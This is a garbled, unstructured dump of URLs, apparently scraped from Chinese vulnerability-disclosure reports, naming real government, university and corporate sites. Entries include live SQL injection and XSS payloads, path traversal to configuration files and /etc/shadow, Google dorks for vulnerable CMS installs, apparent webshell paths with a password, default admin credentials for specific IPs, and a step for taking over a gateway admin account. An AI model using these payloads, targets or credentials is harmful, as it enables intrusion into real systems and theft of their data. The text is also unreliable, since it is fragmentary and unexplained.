http://www.forestry.gov.cn/DownloadFile.jsp?filename=../WEB-INF/struts/struts-config.xml http://www.forestry.gov.cn/DownloadFile.jsp?filename=../DownloadFile.jsp http://www.mayiyou.com/News/NewsList.aspx?Category=2 http://hh.mayiyou.com/NewsList.aspx?Category=143 http://fy.mayiyou.com/NewsList.aspx?Category=137 http://ns.mayiyou.com/NewsList.aspx?Category=87 inurl:php?id= http://wooyun.org/bugs/wooyun-2014-053822 http://www.ahcjwx.com/help_Info.aspx?infoid=2046 http://www.ahcjwx.com/TeacherInfo.aspx?infoId=2026 http://www.ahcjwx.com/St_Stu_Thinking_Minute.aspx?info=4127 http://www.ahcjwx.com/FaceCourseInfo.aspx?infoid=22 http://www.ahcjwx.com/ShopInfo.aspx?infoid=4111 http://www.ahcjwx.com/CjzxInfo.aspx?infoid=117 http://chinakjzj.com/Web_Org/Qa_Quert.aspx?info3=4102 http://ysxy.jjplay.com/show.php?id=88 http://bbs.xyl.gov.cn/admin.php http://wooyun.org/bugs/wooyun-2010-011354 http://jasinda.sysu.edu.cn/jasinda/web.jsp http://210.31.104.8/display.php?ii_id=1073 http://210.31.104.8/display.php?ii_id=1073 http://sqlmap.org http://shhj.k-touch.cn/appfen/deallist.aspx http://www.ahszkj.gov.cn/vote/vote_view.php?id=1 http://mail.***.edu.cn http://hack.com/coremail/s?func=user:proxyGet&sid=CAPplXssSmOlqAgclQsslyZkmdzLcYdA&mid=2:1tbiAgQPE1KpqPIw4QAAsq&url=csrf.jpg http://hack.com/coremail/s/index.php http://127.0.0.1/index.php?s=/InfoDetail/infodetail/tted http://sqlmap.sourceforge.net http://portal.ucweb.com/portal www.baidu.com”等等加入浏览器的黑名单,用户访问,UC浏览器就拦截了,然后.......这个平台可以做的事情还有很多,向用户推送什么什么的都是可以的(截图留念退出) www1.jiande.gov.cn/web/CFCount/Data/ http://feedback.vip.com/feedback!detailFeedback.do?ua_id=124435&childKind=11 http://xsl.zjou.edu.cn/Admin/Default.aspx http://www.chinaunicombidding.cn/ http://www.yfci.cn/wooyun.txt http://www.hrss.jldl.gov.cn/index.php?act=article&doing=list&cid=11 http://www.hrss.jldl.gov.cn/index.php?act=article&doing=list&cid=11 http://www.dianping.com/member/22398119/reviews?reviewCityId=0&reviewShopType=10&c=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&shopTypeIndex=1 www.dianping.com http://www.dianping.com http://www.letushuo.com/group/topic/topicid-240 http://up.51xxs.com/users/public/1402767480_224122.swf http://demo.thinksns.com/t3/weiba/post_2075 www.dgtoyota.com http://www.dgtoyota.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878 http://www.zjsmzw.gov.cn/zjsmzw.rar www.fzyb.gov.cn www.fzyb.gov.cn/dwgzsj/0000******.txt http://ce.wooyun.org/discuss/comment/25 http://www.chinabidding.com.cn/zbw/zxzx/zxzx_show.jsp?record_id=8290587 http://kjxm.szkj.gov.cn/search.aspx?type1=1&type2=1&key=2013 http://kjxm.szkj.gov.cn/search.aspx?type1=1&type2=1&key=2013% http://chem.sicnu.edu.cn/。 http://chem.sicnu.edu.cn/subpage/eventmsg.aspx?ID=11。放在sqlmap里面验证一下我们的说法。 http://zhgl.sicnu.edu.cn/ http://218.70.37.65:8080/index.do http://218.70.37.65:8080/load.do?infoId=35 http://cms.kingdee.com/solutions/business/finance/financeCaseList.jsp?columnId=148201301401 https://seyb.szsi.gov.cn/szwcngr/prg1/slgrcbnew-fw-sq-view.jsp?EventID=CBR_GRCBQUEERY_Action&GRCODE=5005*****&DZSH=2&csrftoken=3e8bfba2935484f4109a597500f0cf1c url:http://demo.cuumall.com/index.php/home/detail/index/id/360 http://www.wrigley.com.cn site:wrigley.com.cn http://elearning.wrigley.com.cn/login.action http://elearning.wrigley.com.cn/password!retrievePwd.action http://elearning.wrigley.com.cn/login.action?redirect:http://www.baidu.com/;网页成功重定向到百度,说明struts2未打补丁,漏洞依然存在。 http://xxx/xss_csrf_shell.js http://www.zyshbj.gov.cn http://www.zyshbj.gov.cn/upload/sa.asp http://www.qlagr.gov.cn http://www.qlagr.gov.cn/c.php http://www.hyswsj.gov.cn/ http://www.hyswsj.gov.cn/123.aspx http://www.nchbj.gov.cn/ http://www.nchbj.gov.cn/admin/2.asp http://www.bzstjj.gov.cn/ http://www.bzstjj.gov.cn/11.asp http://www.dianping.com/shop/1798321/officialphotos/album/tag-1631_%e5%85%a8%e9%83%a8_%e5%85%a8%e9%83%a8_%e6%ac%a7%e7%be%8e%e5%a4%a7%e6%b0%94_%e5%85%a8%e9%83%a8 http://www.dianping.com/shop/1798321/officialphotos/album/tag-1631_%e5%85%a8%e9%83%a8_%e5%85%a8%e9%83%a8_%e6%ac%a7%e7%be%8e%e5%a4%a7%e6%b0%94_%e5%85%a8%e9%83%a8 inurl:cms/sites/nanhai/info_ajax.jsp?columnid= http://www.wandafilm.com/WEB-INF/classes/jdbc.properties jdbc:oracle:thin:@192.***.***.68:1521:ora10g jdbc:oracle:thin:@192.*.*.68:1521:ora10g jdbc:oracle:thin:wd_we***/wd_w***@10.*.*.167:1521:ora10g http://www.ncfdj.gov.cn/admin/Admin_meun.aspx inurl:cms/sites/nanhai/info_ajax.jsp?columnid= http://www.nanhai.gov.cn/cms/sites/nanhai/info_ajax.jsp?columnid=8093&infoid=20140515160815837761427 http://jiujiang.nanhai.gov.cn/cms/sites/nanhai/info_ajax.jsp?columnid=8093&infoid=20140515160815837761427 http://rencai.nanhai.gov.cn/cms/sites/nanhai/info_ajax.jsp?columnid=8093&infoid=20140515160815837761427 http://sifa.nanhai.gov.cn/cms/sites/nanhai/info_ajax.jsp?columnid=8093&infoid=20140515160815837761427 http://www.xzzf.cn/cms/sites/nanhai/info_ajax.jsp?columnid=8093&infoid=20140515160815837761427 http://www.nhjmw.gov.cn/cms/sites/nanhai/info_ajax.jsp?columnid=8093&infoid=20140515160815837761427 http://www.shishan.gov.cn/cms/sites/nanhai/info_ajax.jsp?columnid=8093&infoid=20140515160815837761427 http://3g.paybest.cn/abc_drawing.php?drawing=4 http://www.paybest.cn/ http://www.paybest.cn/robots.txt/.php http://i.178.com/~index.index?uid=1 http://www.sinopecsales.com/gas/res/html/register.jsp http://www.sinopecsales.com/gas/res/html/getpassReal.jsp http://202.105.134.105/login.do http://202.105.134.105/teamserver/faces/ http://202.105.134.105/resManagement/ http://202.105.134.160:8080/ http://www.ybzwsxf.gov.cn/Account/Register1/?UID= http://www.ybzwsxf.gov.cn/AllList/Details/?Code= http://www.ybzwsxf.gov.cn/Account/Register1/?UID= http://www.ybzwsxf.gov.cn/AllList/Details/?Code= http://www.ybzwsxf.gov.cn/Account/Register1/?UID=%27%3B+WAITFOR+DELAY+%270%3A0%3A0%27%3B--+;和 http://www.ybzwsxf.gov.cn/AllList/Details/?Code=%27%3B+WAITFOR+DELAY+%270%3A0%3A0%27%3B--+可以触发sql注入漏洞。其中 http://www.ybzwsxf.gov.cn/Account/Register1/?UID=%27%3B+WAITFOR+DELAY+%270%3A0%3A0%27%3B--+可以被利用开启一个远程shell,进而执行系统管理员命令,控制整个服务器系统;而http://www.ybzwsxf.gov.cn/AllList/Details/?Code=%27%3B+WAITFOR+DELAY+%270%3A0%3A0%27%3B--+ http://202.102.40.94:8080---admin---123456 http://118.85.194.82/---admin---admin http://www.eset.com.cn//download/detail/?product=EAV6 http://www.txwl.cn/case.aspx?cid=763873 http://218.5.1.247:81/gxmh/login.aspx http://www.fjxwcbj.gov.cn/Gxmh/login.aspx http://www.fjaudit.gov.cn/gxmh/login.aspx http://www.fjagri.gov.cn:5501/gxmh/login.aspx http://www.fjrf.gov.cn/Gxmh/login.aspx http://www.fjetc.gov.cn/gxmh/login.aspx http://www.fjphb.gov.cn/Gxmh/login.aspx http://61.154.12.104/Gxmh/login.aspx www.pezx.gov.cn/linkclick.asp?Id=13 http://xss.hk/XIKZ2D?1402886265 http://blog.xiachufang.com/?author=1 http://speed.56.com/pma/ http://speed.56.com/pma/main.php http://116.228.70.245/logout.aspx http://116.228.70.245/NewFabu/NFB_IT.aspx?depart=%D0%C5%CF%A2%BC%BC%CA%F5%B9%DC%C0%ED%D6%D0%D0%C4 http://wo.zdnet.com.cn/files/list.php?c4=1524【注入点】 http://wo.zdnet.com.cn/files/list.php?c1=146【注入点】&c2=902【注入点】 http://shop.ehuatai.com/esale/login/loginAction-login.action?selProvince=901&selCity= http://www.fsmcms.com.cn/) inurl:fsmcms http://www.hzdzkjy.com/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://xfj.wuhai.gov.cn/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://www.btgaj.gov.cn/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://lclyw.gov.cn/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://www.cnfia.cn/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://www.nm166.com/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://www.gxhzjw.gov.cn/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://110.17.162.177/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://www.hzdzkjy.com/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://xfj.wuhai.gov.cn/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://lclyw.gov.cn/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://www.cnfia.cn/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://www.gxhzjw.gov.cn/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://www.ebupt.com/list/roll/fnavid/26* http://shop.paixie.net/ http://shop.paixie.net/apply.html?step=1 http://img-cdn2.paixie.net/newspic/20140616/14029079575bfb68.jpg/xx.php http://pximg2.paixie.net/paixie/201406/13/140266680845674_thumb_12896.jpg/xx.php http://pximg2.paixie.net/paixie/201406/13/140266680845674.jpg/xx.php admin:admin http://cc.shnu.edu.cn/20140624172345427.txt http://74.125.227.77/ http://58.51.84.81:8088/sdh/login.action http://58.51.84.81:8088/sdh/cd.jsp http://plugin.yy.gov.cn/wlb_xxsb/manage_wailaiban/Login.asp http://www.dcci.com.cn/dynamic/view/cid/2/id/1276.html https://github.com/huaimu/Code_Tapas http://doss.dianxinos.com http://zf.huanle.qq.com/cgi-bin/hlddz_box/hlddz_silver_to_gold_box?callback=haha http://i.178.com/~comment.signature.get_afriend_state?uid=1 http://v.sn.vnet.cn/search/list.jsp http://www.py.gov.cn/DesktopModules/C_Info/WebService/C_InfoService.asmx http://tempuri.org/GetArticleHitsArray soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://tempuri.org/ soap:Body soap:Envelope http://www.21tb.com) http://www.21tb.com/web/?c=main&m=clients&type=client http://nftz.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://bsb.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://ccbnb.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://cqpost.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://westaport.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://hnyz.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://ccpm.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://gdtietong.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://zxjt.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://zjsino-life.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://hbed.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://suzhoubank.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://hrcdpx.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://dcpc.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://nftz.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://bsb.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://ccbnb.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://suzhoubank.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://gdtietong.cneln.net/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=8a8080f03f566812013f97d777bb2409&type_id=3&re=0 http://wooyun.org/bugs/wooyun-2014-065153 http://oa.gdjierong.com:8090/flow/flow_get_if_value.aspx?template_id=@@version http://oa.mingshiedu.com:801/flow/flow_get_if_value.aspx?template_id=@@version http://oa.ruvar.com/flow/flow_get_if_value.aspx?template_id=@@version http://116.204.107.145:9000/flow/flow_get_if_value.aspx?template_id=@@version http://www.kinghighway.com:9000/flow/flow_get_if_value.aspx?template_id=@@version http://oa.gdjierong.com:8090/include/get_dict.aspx?bt_id=@@version http://oa.mingshiedu.com:801/include/get_dict.aspx?bt_id=@@version http://oa.ruvar.com/include/get_dict.aspx?bt_id=@@version http://116.204.107.145:9000/include/get_dict.aspx?bt_id=@@version http://www.kinghighway.com:9000/include/get_dict.aspx?bt_id=@@version http://oa.gdjierong.com:8090/include/get_user.aspx http://oa.mingshiedu.com:801/include/get_user.aspx http://oa.ruvar.com/include/get_user.aspx http://116.204.107.145:9000/include/get_user.aspx http://www.kinghighway.com:9000/include/get_user.aspx http://gjdx.sd.vnet.cn/mobile/getstrategy.jsp?imsi=null http://211.139.69.27:8080/euap/download?fileName=help.doc&filePath=../../../../../../../../../../../etc/shadow http://110.76.39.112:8080/szairmiddle/webservice.ws soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:IwebServiceFilterProxy="http://filterWebservice.iss.com soap:Body IwebServiceFilterProxy:filterProxyForws IwebServiceFilterProxy:in0 xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string"/ xsd:anyType xsi:type="xsd:string"/ xsd:anyType xsi:type="xsd:string"/ xsd:anyType xsi:type="xsd:string"/ xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType IwebServiceFilterProxy:in0 IwebServiceFilterProxy:filterProxyForws soap:Body soap:Envelope https://github.com/xiongbiao/sinaSdk/blob/eb9e6c8eb0e20c76fd64e52f0bfb0057755a2310/SwingHtml/bin/system-config.properties http://www.bjszfj.gov.cn/newshow.php?id=1350 http://www.fsmcms.com.cn/) inurl:fsmcms http://www.cnfia.cn/fsmcms/cms/leadermail/p_leadermailsum.jsp http://xfj.wuhai.gov.cn/fsmcms/cms//leadermail/p_leadermailsum.jsp http://lclyw.gov.cn/fsmcms/cms//leadermail/p_leadermailsum.jsp http://www.lylc.gov.cn:9090/fsmcms_lylcq/cms/leadermail/p_leadermailsum.jsp http://www.cnfia.cn/fsmcms/cms/leadermail/p_leadermailsum.jsp http://xfj.wuhai.gov.cn/fsmcms/cms//leadermail/p_leadermailsum.jsp http://lclyw.gov.cn/fsmcms/cms//leadermail/p_leadermailsum.jsp http://www.lylc.gov.cn:9090/fsmcms_lylcq/cms/leadermail/p_leadermailsum.jsp http://www.yinzuo100.com/zhuanti-1255.html http://222.143.36.9/template/govlead_temp1.jsp?sid=5a9c10a542e6953a014476aba7850001 https://github.com/lyu302/-java-soku/blob/eb7be3389885f517c7425b62e7be9677f28e8787/WEB-INF/java/com/youku/soku/manage/timer/Top100ReportMailTimer.java http://ehome.zte.com.cn/index.php?id=569'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=225'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=985'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1368'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=266'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1437'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1414'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1292'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1062'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1319'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=299'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1432'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=445'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1299'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=608'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1504'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=301'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=221'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1376'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=734'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1026'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=steppage_1353895347'%20OR%20sqlspider http://ehome.zte.com.cn/index.php?id=1413'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=615'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=306'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1425'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1372'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1431'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1505'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1377'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1370'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=steppage_1361857688'%20OR%20sqlspider http://ehome.zte.com.cn/index.php?id=1386'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1506'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1498'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1478'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1477'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1385'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=945'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1369'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1315'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1309'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1027'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1421'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1417'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1415'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1412'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1411'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1410'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1401'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1400'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1399'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=276'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=275'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=271'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=270'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=911'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=268'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=steppage_1352873054'%20OR%20sqlspider http://ehome.zte.com.cn/index.php?id=1406'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=steppage_1361512328'%20OR%20sqlspider http://ehome.zte.com.cn/index.php?id=755'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1297'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=209'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1307'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1184'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=steppage_1361857688'%20OR%20sqlspider http://ehome.zte.com.cn/index.php?id=1499'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1422'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1327'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/index.php?id=1057'%20OR%20sqlspider&app=goods http://ehome.zte.com.cn/admin/ http://ehome.zte.com.cn/index.php?app=goods&id=569 http://ehome.zte.com.cn/index.php?app=goods&id=569 http://ehome.zte.com.cn/index.php?app=store&id=6 http://ehome.zte.com.cn/index.php?app=goods&id=225 http://ehome.zte.com.cn/index.php?app=goods&id=225 http://ehome.zte.com.cn/index.php?app=goods&id=1368 http://ehome.zte.com.cn/index.php?app=goods&id=1368 http://ehome.zte.com.cn/index.php?app=store&id=8 http://www.baison.com.cn/ http://www.peiluyou.com/bind.html http://www.peiluyou.com:9999/getconnectionsettings?_act_=getConnectionSettings http://www.peiluyou.com:9999/isxunleiluyou?_act_=getRouterSetting http://www.peiluyou.com:9999/getstatus?statusId=38&_act_=getWifiInfo http://192.168.111.1:9999/ http://218.25.76.211 http://218.25.76.211/UserMN/UserAudit.asp?userId=1992 http://vip.stock.finance.sina.com.cn/corp/view/vCB_BulletinGather.php?stock_str=1111&gg_date=2014-06-04&ftype=0 http://zwhomeimg.focus.cn/lslj/forum/forum_board_new.php?page_id=10&uid=0&pass=0&page=-1 http://ce**.unionpay.com/ http://cli.irkei.com/53/awxvss14/3982/36431/2689/36981/31563/MTIzNDU2QHFxLmNvbQ__/ http://www.bjbus.com/home/news_detail.php?uNewsCode=00002387&uNewsType=2&uPageType=10 http://www.fj10000.net http://www.fj10000.net/xiamen/ http://huij545.cn.99114.com/ProductList.shtml?c=104 http://www.zzfdc.gov.cn/wygl/wyglArticle.jsp?id=199666 http://www.yaolan.com/videos/.svn/entries http://www.yaolan.com/zhishi/tangshishaicha/tangshishaicha.rar http://www.yaolan.com/adservice/adservice.rar http://119.60.2.37/login.aspx loader:URLLoader http://learnguopei.open.com.cn/VECenter/Article/OfflineJobListArea.aspx?ProvinceCode=230000&Classify=3&IsExcellent=1 https://github.com/lijiejie/OutLook_WebAPP_Brute http://host.qycn.com/api_pay/payment_pay_client.php?o_fee=269&o_id=VS_1402975333662680V&tokenkey=ikvIA%252FxwE93eGodSJ3T3WOLXOtIqV0VIdsYye%252F3DNsBIXEjaPS415OnJsB5%252FJBU31iDbxPpf%252BBX%252B10XC6R%252BGpTKOjgxoLOhtZw33M%252F4HnUPKJ8JIOFCpxwwxh0PXX%252BB%252FzdQ3Rf4CEzbqV%252BvcFJWN3q1M%252BF0mYKRf8eV4OiDkdeFVj5yJhKkOIqbA1%252BhuAaQ%252FJrH4b7rOHePdIpvsWvEHTNkViVbuVp4YyzdRya2tyaKLxFr1VPWL%252BFRKKKWqPk6iUaZDIQQ&o_pay_type=1&o_type=1&goods_info=%E9%80%82%E5%90%88%E7%BD%91%E5%BA%97%E3%80%81%E4%B8%93%E4%B8%9A%E8%B5%84%E8%AE%AF%E7%AD%89%E4%B8%AD%E5%B0%8F%E5%9E%8B%E7%BD%91%E7%AB%99&goods_name=%E9%A6%99%E6%B8%AF%E4%BC%81%E4%B8%9AII%E5%9E%8B%2F1%E5%B9%B4&extra_param=12925%2F1%2Ff&time=1402975333 http://202.197.224.60/login.asp http://71party.csu.edu.cn/party_test/login.asp http://pan.baidu.com/s/1mgI5ZhI http://ee.xjtu.edu.cn/dcc/dayi.old/test/Styles/Templates/Default/template.php http://app.cheshi.com/2010vote/vote.php?id=56 http://nmgqgxh.cn.99114.com/ProductList.shtml?c=110 http://hlbenkfm.cn.99114.com/AlbumList.shtml?c=101 http://hqyy.cn.99114.com/AlbumList.shtml?c=101 http://hlbenkfm.cn.99114.com/ProductList.shtml?c=101 http://haoxiangni.cn.99114.com/ProductList.shtml?c=103 http://chengdeshenli.cn.99114.com/ProductList.shtml?c=101 http://sjkxsm.cn.99114.com/ProductList.shtml?c=101 http://haoxiangni.cn.99114.com/AlbumList.shtml?c=101 http://www.228.com.cn/customer/forgotpassword.html http://bbs.scgl.dota2.com.cn/uc_server/admin.php http://zsk.chanjet.com/ up:test www.cqkcy.com/product.php?cid=32 http://eduadmin.open.com.cn/BasicSystem/basicSys/learnCenterLinkInfo.aspx http://business.99114.com/help/list.shtml?code=101102 http://profile.zhenai.com/activity/activityIndex.jsps?ddid=kt%27;%20%20prompt%281%29;%20var%20a=%27 http://cms.wangqi.com/ajax.aspx http://vip.ufida.com.cn/nccsm/customerreport.aspx?customerid=787【注入点】1&customername=%E5%8C%97%E4%BA%AC%E9%93%AD%E6%B3%B0%E9%9B%86%E5%9B%A2&fromdate=1900-01-01&searchkind=%E5%85%A8%E9%83%A8&todate=2010-4-12 http://home.focus.cn/common/loupan/investment/index.php http://binzhou.focus.cn/common/loupan/investment/ http://house.focus.cn/common/loupan/investment/index.php http://tj.focus.cn/common/loupan/investment/index.php site:focus.cn inurl:investment http://villa.focus.cn/common/bin/test.php http://peixun.esf.focus.cn/.htaccess shell:www.jtds.gov.cn/docs/index.jsp pwd:jeary http://sz.focus.cn/group/result.php?v_poll_id=74&group_id=1787 http://www.xinnet.com/account/account.do?method=index两处登录框,可无视验证码进行暴力破解; http://wooyun.org/bugs/wooyun-2014-062080 inurl:APPPROCESS http://jwgl.hrbcu.edu.cn/ACTIONQUERYELECTIVERESULTBYTEACHSECRETARY.APPPROCESS?mode=2 http://cityjw.dlut.edu.cn:7001/ACTIONQUERYELECTIVERESULTBYTEACHSECRETARY.APPPROCESS?mode=2 http://202.97.179.124:8000/ACTIONQUERYELECTIVERESULTBYTEACHSECRETARY.APPPROCESS?mode=2 http://210.30.108.20:7001/ACTIONQUERYELECTIVERESULTBYTEACHSECRETARY.APPPROCESS?mode=2 http://jwgl.hrbcu.edu.cn:80/ http://club.homevv.com/admin.php http://app.fashion.ifeng.com/luxury/photo.php?brand_id=132&img_id=9975 http://www.xunzai.com:8080/ http://www.pabaoxian.com/WebLogin.aspx http://sales.pa18.com/ http://zf.huanle.qq.com/cgi-bin/hlddz_box/hlddz_silver_to_gold_box?callback=u url:http://testt2.pp.cc/member/login url:http://testuser.pp.cc/login.html http://202.118.32.16/qneirong.php?st=xwdt&nid=54 http://vod.phpvod.com/ http://ip/cgi-bin/webif/Objset-users.sh?edituser=edituser&id=5,我们将id=5改为id=4,然后访问,就会到telecomadmin这个用户的管理界面,然后查看网页的源代码就会看到telecomadmin的密码了,重新用telecomadmin登录,就可以完全控制网关了。 inurl:ruleshow.asp inurl:visitshow.asp inurl:visitseacrch.asp inurl:rulelist.asp http://210.30.208.159/sos/rulelist.asp?cid=1 